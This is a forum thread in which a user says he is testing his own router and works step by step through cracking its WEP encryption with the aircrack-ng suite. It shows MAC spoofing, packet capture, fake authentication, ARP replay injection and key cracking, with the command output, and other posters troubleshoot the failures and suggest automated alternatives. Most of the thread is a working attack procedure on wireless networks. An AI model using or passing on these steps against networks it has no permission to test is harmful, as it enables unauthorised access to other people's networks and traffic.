Is there an active client connected to the AP while you are trying to perform the ARP-replay attack? Generally APs will not broadcast any ARP-requests unless there is at least one client connected.Originally Posted by Aiban
W/L card not injecting but is in supported card list
Hey Everyone
Second attempt .. so i cut the convo and just difcuss the issue directly.
After having some "wireless issues" i decided to look into things a bit deeper in order to learn about how to protect myself. I already learnt one thing. Block the mac address of 00:11:22:33:44:55So i want to see how someone got into my system. OK ... so i'm using
Backtrack 3 LiveCD (after spending a few hours doing USB, i found my BIOS didn't allow USB booting .. good lesson for the kiddies
Wireless card is a Dlink Air Plus Xtreme G DWL-G520 HW:B3 FW:4.30
OK ... this this is what i do ... and this is what i get back
Open Shell
-> airmon-ng
wifi0 - atheros - madwifi-ng
ath0 - atheros - madwifi-ng VAP (parent: wifi0)
-> airmon-ng stop ath0
wifi0 - atheros - madwifi-ng
ath0 - atheros - madwifi-ng VAP (parent: wifi0) (VAP Destroyed)
-> ifconfig wifi0 down (i tried ath0 but i get an error saying no such device) just goes to next prompt
->macchanger --mac 00:11:22:33:44:55 wifi0
Current MAC: 00:13:46:xx:xx:xx
Faked MAC: 00:11:22:33:44:55
-> airmon-ng start wifi0
wifi0 - Atheros - madwifi-ng
ath0 - Atheros - madwifi-ng VAP (parent: wifi0) (monitor mode enabled)
->airodump-ng ath0
I find my network
BSSID:00:15:xx:xx:xx:xx PWR:27 Beacons: 23 #data:0 #/s:0 CH:6 MB:54 ENC:WEP CIPHER:WEP Essid:EBC
-> airodump-ng -c 6 -w weppy -bssid 00:15:xx:xx:xx:xx ath0
BSSID:00:15:xx:etc PWR:34 RXQ:100 Beacons:1500 (and counting) #data:70 (and counting slowly) #/s:0 CH:6 MB:54 ENC:WEP CIPHER:WEP ESSID:EBC
Opening a new shell leaving the other running i type
-> aireplay-ng -1 0 -a 00:15:xx:etc -h 00:11:22:33:44:55 -e EBC ath0
Sending Authtication Request (open System) [ACK]
Authentication successful
Sending Association Request [ACK]
Assoication successful :-) (AID: 1)
-- ISSUES START HERE --
-> aireplay-ng -3 -b 00:15:xx:etc -h 00:11:22:33:44:55 ath0
Waiting for beacon frame (BSSID 00:15:xx:etc) on channel 6
Saving ARP requests in replay_arp-1203-020546.cap
You should also start airodump-ng to capture replies
Read 2000 (and counting rapidly) packets (got 0 ARP requests and 0 ACKs) sent 0 packets...(0 pps)
So this is meant to be the important packet imjection that i read so many others have issues with ....
now i did the check on my card and it should be working .. but it isn't .. the #data which i expect
would be going up .. doesn't .. AND i don't get ARP numbers going up ....
Any suggestions would be lovely ...
Thanks guys.
Aiban
Is there an active client connected to the AP while you are trying to perform the ARP-replay attack? Generally APs will not broadcast any ARP-requests unless there is at least one client connected.
-Monkeys are like nature's humans.
Try to use wesside-ng instead of what you are doing
OK .. i can fix that .. probably ... but it's the only wireless machine i have .. but i got parts to build a quick system and dump some crappy netgear card i have lying around into it for the sake of this test.. but it is alot of mucking around (i don't have enough monitors etc so it'll be fun to try hahahah so i hope that this is correct (i'm not doubting of course lol ... but thanks .. i'll give that a go
OK ... after some scrambling .. i got a laptop to borrow from a friend .
I set it up to use my Wireless - and this is what happens....
aireplay-ng -3 -b 00:15:xx:etc -h 00:11:22:33:44:55 ath0
I started some web browsing and a free 1gb download from my ISPs homepage to make sure there was a constant flow of information.
It reads the packets .. and after a short wait, it said i got 1 ARP and the ACK and sent starting moving like crazy. witht he pps shifting from 499/500
BUT ... every few seconds i would get this message
"Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Very slowly .. i got a few more ARP requests ... but only about 5 in 15 minutes.
The other console screen shows the #data rapidly rising and at 30000 i used the
-> aircrack -n 64 -b 00:15:xx:etc weppy-01.cap
I failed after a minute and tells me it'll retry at another 5000 ivs - it has been going and well past 65000 on the next attempt before i aborted.
I'm not sure what this deauth means, i don't know how to get the ARP higher which i assume is a goal to success, but i'm using the internet on the laptop trying to excite the wireless... multiple tabs open, downloads but ARPS are slow and this deauth notice fills my screen.
Thanks for the help so far, it has pushed me further into this ... but need more pushing..
Thankyou
Hey mate - what does this mean
Try to use wesside-ng instead of what you are doing
In place of where? I'm in noobie area cause i'm just following other guides and my knowledge of backtrack doesn't extend beyond those tutes borders.
Wesside-ng is an automated tool/script for cracking WEP, that being said I have tried it a few times but prefer the manual approach.
The error output you get means that you have been disassociated from the AP, which means that it will no longer accept the packets you inject. This is the reason why you notice that the IVs stop climbing as the AP will disregard your injected packets and not give you any response. The fix is however simple, just perform the fake authentication attack again each time this happens (aireplay-ng -1 0...), also make sure that you did not miss this step in the first place. The goal is not to get the ARP count to climb, actually you can crack WEP without ever obtaining a single ARP-request, what you want is for the #data (IVs) count to climb.
Furthermore, you are using the -n 64 mode in aircrack-ng which mean that if the key isn't actually 64 bits long you will never find it regardless of the amount of packets you collect.
-Monkeys are like nature's humans.
Posting Permissions